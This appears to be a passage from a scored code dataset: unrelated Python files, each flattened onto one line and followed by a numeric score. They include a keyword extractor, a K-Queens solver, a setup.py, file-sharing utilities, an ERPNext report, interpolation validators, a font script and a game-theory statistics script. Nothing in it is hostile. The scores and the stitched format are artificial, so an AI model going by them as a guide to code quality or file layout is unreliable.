    texts = map(lambda x: re.sub(r'(.)\1+', r'\1\1', x.string), elements)  # remove duplicated characters in texts
    texts = set(texts)  # remove duplicate
    texts = map(lambda x: reg_control_char.sub('', x), texts)  # remove non printable chars
    texts = sorted(texts, key=lambda a: len(a), reverse=True)  # sort by lenght
    data['texts'] = []
    total_length = sum([len(txt) for txt in texts])
    cumul_length = 0
    for txt in texts:
        cumul_length += len(txt)
        weight = cumul_length * 100 / total_length
        # NOTE(review): `if True or ...` disables the 60% cutoff, so every
        # text fragment is kept — confirm whether that is intentional.
        if True or weight < 60:
            data['texts'].append(txt)
            # print(round(weight, 1), repr(txt)[:220])
    data['texts'] = '. '.join(data['texts'])
    # client.set_cleanup_mode('cleanHTML')
    # client.set_cleanup_return_cleaned(True)
    # text = str(soup)
    client.set_cleanup_mode('raw')
    text = '{title}. {description}. {keywords}. {texts}'.format(**data)
    response = client.analyze(text)
    print(response.ok, response.message, response.error)
    print('LANG', response.language)
    print('RAW', response.raw_text)
    print('CLEAN', response.cleaned_text)
    print('TOPICS')
    for topic in response.topics():
        # Topics arrive sorted by score; stop at the first low-confidence one.
        if topic.score < 0.95:
            break
        print(topic.score, topic.label)  # , topic.wikipedia_link, topic.wikidata_id
    return data


def meta_keywords(meta):
    # NOTE(review): unfinished — reads meta['texts'] but computes nothing
    # and implicitly returns None, so the caller below prints None.
    texts = meta['texts']
    # meta['keywords'] =


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='extract keywords from urls')
    parser.add_argument('-i', '--input', metavar='in', type=str,
                        help='input file in CVS format', required=True)
    parser.add_argument('-o', '--output', metavar='out', type=str,
                        help='output file in CVS format',
                        default='<input>-keywords.cvs')
    args = parser.parse_args()
    if args.output == '<input>-keywords.cvs':
        # Derive the default output name from the input file's basename.
        args.output = '{}-keywords.cvs'.format(os.path.splitext(args.input)[0])
    data = {}
    for url in read_urls(args.input):
        if url.startswith('#'):
            # Lines starting with '#' in the input CSV are treated as comments.
            continue
        print('fetching url {}'.format(url))
        html = fetch_page(url)
        if html == None:
            continue
        meta_raw = extract_meta(html)
        meta = meta_keywords(meta_raw)
        print(meta)
0.027841
# -*- coding: utf-8 -*- from LocalSearchGames.min_conflicts_game import MinConflictsGame from LocalSearchGames.simulated_annealing_game import SimulatedAnnealingGame from LocalSearchGames.state_manager import StateManager from LocalSearchGames.game_levels import GameLevel from LocalSearchGames.constraints import Constraint def queen_not_under_attack(state, list_vars): var1, var2 = list_vars queen_i = (var1, state[var1]) queen_j = (var2, state[var2]) return queen_j[1] not in ( queen_i[1], queen_i[1] + abs(queen_i[0] - queen_j[0]), queen_i[1] - abs(queen_i[0] - queen_j[0]) ) class KQueensManager(StateManager): """ State manager for a K-Queens game """ def __init__(self): super(KQueensManager, self).__init__() self.K = 0 def __set_constraints(self): self.constraints = [] for i in xrange(self.K): for j in xrange(i + 1, self.K): self.constraints.append( Constraint((i, j), queen_not_under_attack) ) def build_new_game(self, level): if level == GameLevel.EASY: self.K = 8 elif level == GameLevel.MEDIUM: self.K = 25 else: self.K = 1000 domain = xrange(self.K) self.vars = {i: domain for i in xrange(self.K)} self.__set_constraints() def __str__(self): """ Returns a representation of the current state as a string """ _str = "" _str = "-" * (4 * self.K) + "\n" for i in xrange(self.K): for j in xrange(self.K): if self.state[i] == j: _str += " Q |" else: _str += " |" _str += "\n" _str += "-" * (4 * self.K) return _str class KQueensMC(MinConflictsGame): """ K-Queens game based on min conflicts algorithm """ def __init__(self): super(KQueensMC, self).__init__() self.state_manager = KQueensManager() class KQueensSA(SimulatedAnnealingGame): """ K-Queens game based on simulated annealing algorithm """ def __init__(self): super(KQueensSA, self).__init__() self.state_manager = KQueensManager()
0
#!/usr/bin/env python # Copyright 2014 Rackspace # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the # License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an "AS # IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either # express or implied. See the License for the specific language # governing permissions and limitations under the License. import os import sys import setuptools # Utility function to read the README file def readfile(filename): with open(filename) as f: return f.read() # Utility function to read requirements.txt files def readreq(filename): result = [] with open(filename) as f: for line in f: line = line.strip() # Process requirement file references if line.startswith('-r '): subfilename = line.split(None, 1)[-1].split('#', 1)[0].strip() if subfilename: result += readreq(subfilename) continue # Strip out "-e" prefixes if line.startswith('-e '): line = line.split(None, 1)[-1] # Detect URLs in the line idx = line.find('#egg=') if idx >= 0: line = line[idx + 5:] # Strip off any comments line = line.split('#', 1)[0].strip() # Save the requirement if line: result.append(line.split('#', 1)[0].strip()) return result # Invoke setup setuptools.setup( name='timid', version='0.1.2', author='Kevin L. 
Mitchell', author_email='kevin.mitchell@rackspace.com', url='https://github.com/rackerlabs/timid', description='Timid test runner', long_description=readfile('README.rst'), license='Apache License (2.0)', classifiers=[ 'Development Status :: 3 - Alpha', 'Environment :: Console', 'License :: OSI Approved :: Apache Software License', 'Programming Language :: Python', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4', ], packages=setuptools.find_packages(exclude=['tests', 'tests.*']), install_requires=readreq('requirements.txt'), tests_require=readreq('test-requirements.txt'), entry_points={ 'console_scripts': [ 'timid = timid.main:timid.console', ], 'timid.actions': [ 'chdir = timid.environment:DirectoryAction', 'env = timid.environment:EnvironmentAction', 'include = timid.steps:IncludeAction', 'run = timid.environment:RunAction', 'var = timid.context:VariableAction', ], 'timid.modifiers': [ 'when = timid.modifiers:ConditionalModifier', 'ignore-errors = timid.modifiers:IgnoreErrorModifier', ], }, )
0
# Copyright (c) 2001-2003 Alexander Kanavin. All rights reserved. # licensed under the GNU GPL 2 # # 2004-10-8 NRY Imported from PySoulSeek package """ This module contains utility fuctions. """ import string import os.path import os,dircache import mp3 version = "1.2.5" def getServerList(url): """ Parse server text file from http://www.slsk.org and return a list of servers """ import urllib,string try: f = urllib.urlopen(url) list = [string.strip(i) for i in f.readlines()] except: return [] try: list = list[list.index("--servers")+1:] except: return [] list = [string.split(i,":",2) for i in list] try: return [[i[0],i[2]] for i in list] except: return [] def rescandirs(shared, sharedmtimes, sharedfiles, sharedfilesstreams, yieldfunction): newmtimes = getDirsMtimes(shared,yieldfunction) newsharedfiles = getFilesList(newmtimes, sharedmtimes, sharedfiles,yieldfunction) newsharedfilesstreams = getFilesStreams(newmtimes, sharedmtimes, sharedfilesstreams, newsharedfiles,yieldfunction) newwordindex, newfileindex = getFilesIndex(newmtimes, sharedmtimes, shared, newsharedfiles,yieldfunction) return newsharedfiles,newsharedfilesstreams,newwordindex,newfileindex, newmtimes def getDirsMtimes(dirs, yieldcall = None): list = {} for i in dirs: i = i.replace("//","/") try: contents = dircache.listdir(i) mtime = os.path.getmtime(i) except OSError, errtuple: print errtuple continue list[i] = mtime for f in contents: pathname = os.path.join(i, f) try: isdir = os.path.isdir(pathname) mtime = os.path.getmtime(pathname) except OSError, errtuple: print errtuple continue else: if isdir: list[pathname] = mtime dircontents = getDirsMtimes([pathname]) for k in dircontents: list[k] = dircontents[k] if yieldcall is not None: yieldcall() return list def getFilesList(mtimes, oldmtimes, oldlist, yieldcall = None): """ Get a list of files with their filelength and (if mp3) bitrate and track length in seconds """ list = {} for i in mtimes: if oldmtimes.has_key(i): if mtimes[i] == oldmtimes[i]: 
list[i] = oldlist[i] continue list[i] = [] try: contents = dircache.listdir(i) except OSError, errtuple: print errtuple continue for f in contents: pathname = os.path.join(i, f) try: isfile = os.path.isfile(pathname) except OSError, errtuple: print errtuple continue else: if isfile: # It's a file, check if it is mp3 list[i].append(getFileInfo(f,pathname)) if yieldcall is not None: yieldcall() return list def getFileInfo(name, pathname): size = os.path.getsize(pathname) if name[-4:] == ".mp3" or name[-4:] == ".MP3": mp3info=mp3.detect_mp3(pathname) if mp3info: if mp3info["vbr"]: bitrateinfo = (mp3info["vbrrate"],1) else: bitrateinfo = (mp3info["bitrate"],0) fileinfo = (name,size,bitrateinfo,mp3info["time"]) else: fileinfo = (name,size,None,None) elif name[-4:] == ".ogg" or name[-4:] == ".OGG": try: import ogg.vorbis vf = ogg.vorbis.VorbisFile(pathname) time = int(vf.time_total(0)) bitrate = vf.bitrate(0)/1000 fileinfo = (name,size, (bitrate,0), time) except: fileinfo = (name,size,None,None) else: fileinfo = (name,size,None,None) return fileinfo def getFilesStreams(mtimes, oldmtimes, oldstreams, sharedfiles, yieldcall = None): streams = {} for i in mtimes.keys(): if oldmtimes.has_key(i): if mtimes[i] == oldmtimes[i]: streams[i] = oldstreams[i] continue streams[i] = getDirStream(sharedfiles[i]) if yieldcall is not None: yieldcall() return streams def getDirStream(dir): from slskmessages import SlskMessage msg = SlskMessage() stream = msg.packObject(len(dir)) for i in dir: stream = stream + getByteStream(i) return stream def getByteStream(fileinfo): from slskmessages import SlskMessage self = SlskMessage() stream = chr(1) + self.packObject(fileinfo[0]) + self.packObject(fileinfo[1]) + self.packObject(0) if fileinfo[2] is not None: stream = stream + self.packObject('mp3') + self.packObject(3) stream = stream + self.packObject(0)+ self.packObject(fileinfo[2][0])+self.packObject(1)+ self.packObject(fileinfo[3])+self.packObject(2)+self.packObject(fileinfo[2][1]) else: 
stream = stream + self.packObject('') + self.packObject(0) return stream def getFilesIndex(mtimes, oldmtimes, shareddirs,sharedfiles, yieldcall = None): wordindex = {} fileindex = {} index = 0 for i in mtimes.keys(): for j in sharedfiles[i]: indexes = getIndexWords(i,j[0],shareddirs) for k in indexes: wordindex.setdefault(k,[]).append(index) fileindex[str(index)] = (os.path.join(i,j[0]),)+j[1:] index += 1 if yieldcall is not None: yieldcall() return wordindex, fileindex def getIndexWords(dir,file,shareddirs): import os.path,string for i in shareddirs: if os.path.commonprefix([dir,i]) == i: dir = dir[len(i):] words = string.split(string.lower(string.translate(dir+' '+file, string.maketrans(string.punctuation,string.join([' ' for i in string.punctuation],''))))) # remove duplicates d = {} for x in words: d[x] = x return d.values()
0.037733
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # License: GNU General Public License v3. See license.txt from __future__ import unicode_literals import frappe, erpnext from frappe import _ from frappe.utils import flt from erpnext.accounts.report.item_wise_sales_register.item_wise_sales_register import (get_tax_accounts, get_grand_total, add_total_row, get_display_value, get_group_by_and_display_fields, add_sub_total_row, get_group_by_conditions) def execute(filters=None): return _execute(filters) def _execute(filters=None, additional_table_columns=None, additional_query_columns=None): if not filters: filters = {} filters.update({"from_date": filters.get("date_range")[0], "to_date": filters.get("date_range")[1]}) columns = get_columns(additional_table_columns, filters) company_currency = erpnext.get_company_currency(filters.company) item_list = get_items(filters, additional_query_columns) aii_account_map = get_aii_accounts() if item_list: itemised_tax, tax_columns = get_tax_accounts(item_list, columns, company_currency, doctype="Purchase Invoice", tax_doctype="Purchase Taxes and Charges") po_pr_map = get_purchase_receipts_against_purchase_order(item_list) data = [] total_row_map = {} skip_total_row = 0 prev_group_by_value = '' if filters.get('group_by'): grand_total = get_grand_total(filters, 'Purchase Invoice') for d in item_list: if not d.stock_qty: continue purchase_receipt = None if d.purchase_receipt: purchase_receipt = d.purchase_receipt elif d.po_detail: purchase_receipt = ", ".join(po_pr_map.get(d.po_detail, [])) expense_account = d.expense_account or aii_account_map.get(d.company) row = { 'item_code': d.item_code, 'item_name': d.item_name, 'item_group': d.item_group, 'description': d.description, 'invoice': d.parent, 'posting_date': d.posting_date, 'supplier': d.supplier, 'supplier_name': d.supplier_name } if additional_query_columns: for col in additional_query_columns: row.update({ col: d.get(col) }) row.update({ 'credit_to': 
d.credit_to, 'mode_of_payment': d.mode_of_payment, 'project': d.project, 'company': d.company, 'purchase_order': d.purchase_order, 'purchase_receipt': d.purchase_receipt, 'expense_account': expense_account, 'stock_qty': d.stock_qty, 'stock_uom': d.stock_uom, 'rate': d.base_net_amount / d.stock_qty, 'amount': d.base_net_amount }) total_tax = 0 for tax in tax_columns: item_tax = itemised_tax.get(d.name, {}).get(tax, {}) row.update({ frappe.scrub(tax + ' Rate'): item_tax.get("tax_rate", 0), frappe.scrub(tax + ' Amount'): item_tax.get("tax_amount", 0), }) total_tax += flt(item_tax.get("tax_amount")) row.update({ 'total_tax': total_tax, 'total': d.base_net_amount + total_tax, 'currency': company_currency }) if filters.get('group_by'): row.update({'percent_gt': flt(row['total']/grand_total) * 100}) group_by_field, subtotal_display_field = get_group_by_and_display_fields(filters) data, prev_group_by_value = add_total_row(data, filters, prev_group_by_value, d, total_row_map, group_by_field, subtotal_display_field, grand_total, tax_columns) add_sub_total_row(row, total_row_map, d.get(group_by_field, ''), tax_columns) data.append(row) if filters.get('group_by') and item_list: total_row = total_row_map.get(prev_group_by_value or d.get('item_name')) total_row['percent_gt'] = flt(total_row['total']/grand_total * 100) data.append(total_row) data.append({}) add_sub_total_row(total_row, total_row_map, 'total_row', tax_columns) data.append(total_row_map.get('total_row')) skip_total_row = 1 return columns, data, None, None, None, skip_total_row def get_columns(additional_table_columns, filters): columns = [] if filters.get('group_by') != ('Item'): columns.extend( [ { 'label': _('Item Code'), 'fieldname': 'item_code', 'fieldtype': 'Link', 'options': 'Item', 'width': 120 }, { 'label': _('Item Name'), 'fieldname': 'item_name', 'fieldtype': 'Data', 'width': 120 } ] ) if filters.get('group_by') not in ('Item', 'Item Group'): columns.extend([ { 'label': _('Item Group'), 'fieldname': 
'item_group', 'fieldtype': 'Link', 'options': 'Item Group', 'width': 120 } ]) columns.extend([ { 'label': _('Description'), 'fieldname': 'description', 'fieldtype': 'Data', 'width': 150 }, { 'label': _('Invoice'), 'fieldname': 'invoice', 'fieldtype': 'Link', 'options': 'Purchase Invoice', 'width': 120 }, { 'label': _('Posting Date'), 'fieldname': 'posting_date', 'fieldtype': 'Date', 'width': 120 } ]) if filters.get('group_by') != 'Supplier': columns.extend([ { 'label': _('Supplier'), 'fieldname': 'supplier', 'fieldtype': 'Link', 'options': 'Supplier', 'width': 120 }, { 'label': _('Supplier Name'), 'fieldname': 'supplier_name', 'fieldtype': 'Data', 'width': 120 } ]) if additional_table_columns: columns += additional_table_columns columns += [ { 'label': _('Payable Account'), 'fieldname': 'credit_to', 'fieldtype': 'Link', 'options': 'Account', 'width': 80 }, { 'label': _('Mode Of Payment'), 'fieldname': 'mode_of_payment', 'fieldtype': 'Link', 'options': 'Mode of Payment', 'width': 120 }, { 'label': _('Project'), 'fieldname': 'project', 'fieldtype': 'Link', 'options': 'Project', 'width': 80 }, { 'label': _('Company'), 'fieldname': 'company', 'fieldtype': 'Link', 'options': 'Company', 'width': 80 }, { 'label': _('Purchase Order'), 'fieldname': 'purchase_order', 'fieldtype': 'Link', 'options': 'Purchase Order', 'width': 100 }, { 'label': _("Purchase Receipt"), 'fieldname': 'Purchase Receipt', 'fieldtype': 'Link', 'options': 'Purchase Receipt', 'width': 100 }, { 'label': _('Expense Account'), 'fieldname': 'expense_account', 'fieldtype': 'Link', 'options': 'Account', 'width': 100 }, { 'label': _('Stock Qty'), 'fieldname': 'stock_qty', 'fieldtype': 'Float', 'width': 100 }, { 'label': _('Stock UOM'), 'fieldname': 'stock_uom', 'fieldtype': 'Link', 'options': 'UOM', 'width': 100 }, { 'label': _('Rate'), 'fieldname': 'rate', 'fieldtype': 'Float', 'options': 'currency', 'width': 100 }, { 'label': _('Amount'), 'fieldname': 'amount', 'fieldtype': 'Currency', 'options': 
'currency', 'width': 100 }, { 'fieldname': 'currency', 'label': _('Currency'), 'fieldtype': 'Currency', 'width': 80, 'hidden': 1 } ] if filters.get('group_by'): columns.append({ 'label': _('% Of Grand Total'), 'fieldname': 'percent_gt', 'fieldtype': 'Float', 'width': 80 }) return columns def get_conditions(filters): conditions = "" for opts in (("company", " and company=%(company)s"), ("supplier", " and `tabPurchase Invoice`.supplier = %(supplier)s"), ("item_code", " and `tabPurchase Invoice Item`.item_code = %(item_code)s"), ("from_date", " and `tabPurchase Invoice`.posting_date>=%(from_date)s"), ("to_date", " and `tabPurchase Invoice`.posting_date<=%(to_date)s"), ("mode_of_payment", " and ifnull(mode_of_payment, '') = %(mode_of_payment)s")): if filters.get(opts[0]): conditions += opts[1] if not filters.get("group_by"): conditions += "ORDER BY `tabPurchase Invoice`.posting_date desc, `tabPurchase Invoice Item`.item_code desc" else: conditions += get_group_by_conditions(filters, 'Purchase Invoice') return conditions def get_items(filters, additional_query_columns): conditions = get_conditions(filters) if additional_query_columns: additional_query_columns = ', ' + ', '.join(additional_query_columns) else: additional_query_columns = '' return frappe.db.sql(""" select `tabPurchase Invoice Item`.`name`, `tabPurchase Invoice Item`.`parent`, `tabPurchase Invoice`.posting_date, `tabPurchase Invoice`.credit_to, `tabPurchase Invoice`.company, `tabPurchase Invoice`.supplier, `tabPurchase Invoice`.remarks, `tabPurchase Invoice`.base_net_total, `tabPurchase Invoice Item`.`item_code`, `tabPurchase Invoice Item`.`item_name`, `tabPurchase Invoice Item`.`item_group`, `tabPurchase Invoice Item`.description, `tabPurchase Invoice Item`.`project`, `tabPurchase Invoice Item`.`purchase_order`, `tabPurchase Invoice Item`.`purchase_receipt`, `tabPurchase Invoice Item`.`po_detail`, `tabPurchase Invoice Item`.`expense_account`, `tabPurchase Invoice Item`.`stock_qty`, `tabPurchase Invoice 
Item`.`stock_uom`, `tabPurchase Invoice Item`.`base_net_amount`, `tabPurchase Invoice`.`supplier_name`, `tabPurchase Invoice`.`mode_of_payment` {0} from `tabPurchase Invoice`, `tabPurchase Invoice Item` where `tabPurchase Invoice`.name = `tabPurchase Invoice Item`.`parent` and `tabPurchase Invoice`.docstatus = 1 %s """.format(additional_query_columns) % (conditions), filters, as_dict=1) def get_aii_accounts(): return dict(frappe.db.sql("select name, stock_received_but_not_billed from tabCompany")) def get_purchase_receipts_against_purchase_order(item_list): po_pr_map = frappe._dict() po_item_rows = list(set([d.po_detail for d in item_list])) if po_item_rows: purchase_receipts = frappe.db.sql(""" select parent, purchase_order_item from `tabPurchase Receipt Item` where docstatus=1 and purchase_order_item in (%s) group by purchase_order_item, parent """ % (', '.join(['%s']*len(po_item_rows))), tuple(po_item_rows), as_dict=1) for pr in purchase_receipts: po_pr_map.setdefault(pr.po_detail, []).append(pr.parent) return po_pr_map
0.033238
# coding=utf-8 """ **Commonalities used in both 1d and 2d interpolation** This module provides commonalities shared between interpolation1d and interpolation2d. This includes input data validation methods. """ import numpy from safe.common.exceptions import BoundsError, InaSAFEError def validate_mode(mode): """Validate that the mode is an allowable value. :param mode: Determines the interpolation order. Options are: * 'constant' - piecewise constant nearest neighbour interpolation * 'linear' - bilinear interpolation using the two nearest \ neighbours (default) :type mode: str :raises: InaSAFEError """ msg = ( 'Only mode "linear" and "constant" are implemented. I got "%s"' % mode) if mode not in ['linear', 'constant']: raise InaSAFEError(msg) def validate_coordinate_vector(coordinates, coordinate_name): """Validate that the coordinates vector are valid :param coordinates: The coordinates vector :type coordinates: numpy.ndarray :param coordinate_name: The user recognizable name of the coordinates. :type coordinate_name: str :raise: Exception, InaSAFEError :returns: Coordinates cast as a numpy arry """ try: coordinates = numpy.array(coordinates) except Exception, e: msg = ( 'Input vector %s could not be converted to numpy array: ' '%s' % (coordinate_name, str(e))) raise Exception(msg) if not min(coordinates) == coordinates[0]: msg = ( 'Input vector %s must be monotoneously increasing. ' 'I got min(%s) == %.15f, but coordinates[0] == %.15f' % ( coordinate_name, coordinate_name, min(coordinates), coordinates[0])) raise InaSAFEError(msg) if not max(coordinates) == coordinates[-1]: msg = ( 'Input vector coordinates must be monotoneously increasing. 
I got ' 'max(coordinates) == %.15f, but coordinates[-1] == %.15f' % ( max(coordinates), coordinates[-1])) raise InaSAFEError(msg) return coordinates def validate_inputs( x=None, y=None, z=None, points=None, bounds_error=None): """Check inputs for interpolate1d and interpolate2d functions :param x: 1D array of x-coordinates on which to interpolate :type x: numpy.ndarray :param y: 1D array of y-coordinates on which to interpolate :type z: numpy.ndarray :param z: array of values for each x :type z: numpy.ndarray :param points: 1D array of coordinates where interpolated values are sought :type points: numpy.ndarray :param bounds_error: Flag to indicate whether an exception will be raised when interpolated values are requested outside the domain of the input data. If False, nan is returned for those values. :type bounds_error: bool :returns: x, z and points :raises: RuntimeError, Exception """ x = validate_coordinate_vector(x, 'x') if y is None: dimensions = 1 else: dimensions = 2 y = validate_coordinate_vector(y, 'y') try: z = numpy.array(z) except Exception, e: msg = ( 'Input vector z could not be converted to a numpy array: ' '%s' % str(e)) raise Exception(msg) if len(z.shape) != dimensions: msg = 'z must be a %iD numpy array got a: %dD' % ( dimensions, len(z.shape)) raise Exception(msg) Nx = len(x) points = numpy.array(points) if not len(points.shape) == dimensions: msg = 'Interpolation points must be a %id array' % dimensions raise RuntimeError(msg) if dimensions == 1: (m,) = z.shape if not Nx == m: msg = ( 'Input array z must have same length as x (%i).' 'However, Z has length %i.' % (Nx, m)) raise RuntimeError(msg) # Get interpolation points xi = points[:] else: (m, n) = z.shape Ny = len(y) if not (Nx == m and Ny == n): msg = ( 'Input array Z must have dimensions %i x %i corresponding to ' 'the lengths of the input coordinates x and y. However, ' 'Z has dimensions %i x %i.' 
% (Nx, Ny, m, n)) raise InaSAFEError(msg) # Get interpolation points points = numpy.array(points) xi = points[:, 0] eta = points[:, 1] if bounds_error: xi0 = min(xi) xi1 = max(xi) if xi0 < x[0]: msg = ( 'Interpolation point xi=%f was less than the smallest ' 'value in domain (x=%f) and bounds_error was requested.' % (xi0, x[0])) raise BoundsError(msg) if xi1 > x[-1]: msg = ( 'Interpolation point xi=%f was greater than the largest ' 'value in domain (x=%f) and bounds_error was requested.' % (xi1, x[-1])) raise BoundsError(msg) if dimensions == 2: # noinspection PyUnboundLocalVariable eta0 = min(eta) eta1 = max(eta) if eta0 < y[0]: msg = ( 'Interpolation point eta=%f was less than the smallest ' 'value in domain (y=%f) and bounds_error was requested.' % (eta0, y[0])) raise BoundsError(msg) if eta1 > y[-1]: msg = ( 'Interpolation point eta=%f was greater than the largest ' 'value in domain (y=%f) and bounds_error was requested.' % (eta1, y[-1])) raise BoundsError(msg) if dimensions == 1: return x, z, xi else: return x, y, z, xi, eta
0
#MenuTitle: Flashify Pixels # -*- coding: utf-8 -*- __doc__=""" Adds small bridges to diagonal pixel connections (where two pixel corners touch). Otherwise your counters may be lost in the Flash text engine. """ import GlyphsApp Font = Glyphs.font layers = Font.selectedLayers removeOverlapFilter = NSClassFromString("GlyphsFilterRemoveOverlap").alloc().init() def karo( x, y ): koordinaten = [ [x-1,y], [x,y-1], [x+1,y], [x,y+1] ] karo = GSPath() for xy in koordinaten: newnode = GSNode() newnode.type = GSLINE newnode.position = (xy[0], xy[1]) karo.nodes.append( newnode ) karo.closed = True return karo def process( thisLayer ): thisLayer.parent.beginUndo() purePathsLayer = thisLayer.copyDecomposedLayer() removeOverlapFilter.runFilterWithLayer_error_( purePathsLayer, None ) coordinatelist = [] for thisPath in purePathsLayer.paths: for thisNode in thisPath.nodes: coordinatelist.append([ thisNode.x, thisNode.y ]) mylength = len( coordinatelist ) for cur1 in range( mylength ): for cur2 in range( cur1+1, mylength, 1 ): if coordinatelist[cur1] == coordinatelist[cur2]: [ my_x, my_y ] = coordinatelist[ cur1 ] thisLayer.paths.append( karo( my_x, my_y ) ) print thisLayer.parent.name, ":", my_x, my_y thisLayer.parent.endUndo() print "Flashifying " + str( Font.familyName ) oldGridstep = Font.gridLength if oldGridstep > 1: Font.gridLength = 1 Font.disableUpdateInterface() for thisLayer in layers: process( thisLayer ) Font.enableUpdateInterface() Font.gridLength = oldGridstep
0.047773
#! /usr/bin/python # -*- coding: utf-8 -*- # Developped with python 2.7.3 import tools import sys import os import matplotlib import pygal import numbers from math import sqrt def lst_str_to_float(l): i = 0 for el in l: l[i] = float(el) i +=1 return l def do_your_job(full_path_csv_file): file_name = (full_path_csv_file.split("/")).pop() data = tools.read_specific_file(full_path_csv_file, "csv") # I guess that encoding the file in json would be a better choice.... # each line of the csv file (the expected one) is formated as it follow: key::value;key::value; etc... # where value could be : character or key:value table ( e.g. ["a","b","c"]:[1,2,3] ) tab = [] temp_map = {} for line in data: temp_map = {} for pair in line: pair = pair.split("::") if len(pair[1].split(":")) == 1: if isinstance(pair[1], numbers.Real) or pair[1].isdigit(): temp_map[pair[0]] = float(pair[1]) else: temp_map[pair[0]] = pair[1] else: temp_map[pair[0]] = {} map_of_object_int = (pair[1].split(":")) # list of object (map_of_object_int[0]) could be : floats or strings list_of_keys = tools.str_table_to_list(map_of_object_int[0]) list_of_values = tools.str_table_to_list(map_of_object_int[1]) i = 0 for key in list_of_keys: temp_map[pair[0]][key] = list_of_values[i] i += 1 tab.append(temp_map) # static values mapped with possible dynamic (string) values key_value_of_data = { 0:"Value", 1:"C", 2:"D", 3:"IdealRepartition", 4:"GuiltRep", 5:"SumPayOffs", 6:"MinPayOffs", 7:"MaxPayOffs", 8:"Iteration",9:"IdealRepartition",91:"Rawls",92:"Harsanyi",10:"GainFreq"} list_of_conf = {"C":{},"D":{}} computed_stat = {0:"gain",1:"guilt_lvl",2:"iteration"} stat_elements = {0:"min",1:"max",2:"mean",3:"sum", 4:"standard_deviation", 5:"configuration_count"} statistics = {} # 1:{0:{},1:{}},2:{0:{},1:{}} # init statistics variable for key in [1,2]: # 1 is C and 2 is D statistics[key] = {} statistics[key][key_value_of_data[0]] = [] # list of configurations in statistics[key] for type_stat in computed_stat.keys(): 
statistics[key][type_stat] = {} for stat_element in stat_elements.keys(): val = 0 if stat_element == 0: # min val = 9999 if stat_element == 1: # max val = -9999 statistics[key][type_stat][stat_element] = val # statistics computation first_it_x = True # a little trick to bypass the -9999 and 9999 min / max for record in tab: ## number of agent of the record number_of_agent = 0 if key_value_of_data[91] in record[key_value_of_data[9]].keys(): number_of_agent += float(record[key_value_of_data[9]][key_value_of_data[91]]) if key_value_of_data[92] in record[key_value_of_data[9]].keys(): number_of_agent += float(record[key_value_of_data[9]][key_value_of_data[92]]) # fix bug ideal key = '' if number_of_agent == 0: number_of_agent = record[key_value_of_data[9]][record[key_value_of_data[9]].keys()[0]] ## absolute strategy of record if record[key_value_of_data[1]]>record[key_value_of_data[2]]: strategy = 1 else: strategy = 2 statistics[strategy][key_value_of_data[0]].append(record[key_value_of_data[0]]) # we add configuration (TRPS) string in C or D side of the map #### guilt #### omega = sum(record[key_value_of_data[4]].values()) ## count first_it_y = True for guilt_lvl, guilt_weight in record[key_value_of_data[4]].iteritems(): guilt_lvl = float(guilt_lvl) guilt_weight = float(guilt_weight) if first_it_y: # We set guilt level default min and max value as the first iteration of the map statistics[strategy][1][0] = guilt_lvl statistics[strategy][1][1] = guilt_lvl first_it_y = False ### guilt scale ### ## min if guilt_lvl < statistics[strategy][1][0]: statistics[strategy][1][0] = guilt_lvl ## max if guilt_lvl > statistics[strategy][1][1]: statistics[strategy][1][1] = guilt_lvl ## sum statistics[strategy][1][3] += (guilt_lvl*guilt_weight)/omega ## count statistics[strategy][1][5] += guilt_weight/omega #### gain #### if first_it_x: statistics[strategy][0][0] = float(record[key_value_of_data[6]]) statistics[strategy][0][1] = float(record[key_value_of_data[7]]) ## min if 
float(record[key_value_of_data[6]]) < statistics[strategy][0][0]: statistics[strategy][0][0] = float(record[key_value_of_data[6]]) ## max if float(record[key_value_of_data[7]]) > statistics[strategy][0][1]: statistics[strategy][0][1] = float(record[key_value_of_data[7]]) ## sum statistics[strategy][0][3] += float(record[key_value_of_data[5]]) ## count statistics[strategy][0][5] += number_of_agent #### iteration #### ## min if float(record[key_value_of_data[8]]) < statistics[strategy][2][0]: statistics[strategy][2][0] = float(record[key_value_of_data[8]]) ## max if float(record[key_value_of_data[8]]) > statistics[strategy][2][1]: statistics[strategy][2][1] = float(record[key_value_of_data[8]]) ## sum statistics[strategy][2][3] += float(record[key_value_of_data[8]]) ## count statistics[strategy][2][5] += 1 first_it_x = False for key in [1,2]: for stat_type in computed_stat.keys(): if(statistics[key][stat_type][5] != 0): ## mean statistics[key][stat_type][2] = round(float(statistics[key][stat_type][3]) / statistics[key][stat_type][5], 2) ## std-dev statistics[key][stat_type][4] = round( sqrt( abs(float(statistics[key][stat_type][3]) - (statistics[key][stat_type][5] * statistics[key][stat_type][2])) ) ,4) else: statistics[key][stat_type][2] = 0 statistics[key][stat_type][4] = 0 path = "" # no need to specify any path yet. 
from pygal.style import LightStyle # Gains chart gain_chart = pygal.Bar(fill=True, interpolate='cubic', style=LightStyle) gain_chart.title = 'Gains knowing strategy types' gain_chart.x_labels = map(str, ["Cooperative ("+str(int(statistics[1][0][5]))+" agt)","Non-cooperative ("+str(int(statistics[2][0][5]))+" agt)"]) gain_chart.add('Min', [statistics[1][0][0], statistics[2][0][0]]) gain_chart.add('Mean', [statistics[1][0][2], statistics[2][0][2]]) gain_chart.add('Max', [statistics[1][0][1], statistics[2][0][1]]) #gain_chart.add('Std-dev', [statistics[1][0][4], statistics[2][0][4]]) gain_chart.render_to_file(path+"gains_with_"+file_name+".svg") gain_chart = pygal.Bar(fill=True, interpolate='cubic', style=LightStyle) gain_chart.title = 'Sum of gains knowing strategy types' gain_chart.x_labels = map(str, ['Cooperative ('+str(int(statistics[1][0][5]))+' agt)','Non-cooperative ('+str(int(statistics[2][0][5]))+' agt)','Both ('+str(int(statistics[1][0][5])+int(statistics[1][0][5]))+' agt)']) gain_chart.add("", [statistics[1][0][3], statistics[2][0][3], statistics[1][0][3]+statistics[2][0][3]]) gain_chart.render_to_file(path+"sum_gains_with_"+file_name+".svg") # Strat dominance chart strat_chart = pygal.Pie(fill=True, interpolate='cubic', style=LightStyle) strat_chart.title = 'Strategy which prevail' strat_chart.x_labels = map(str, 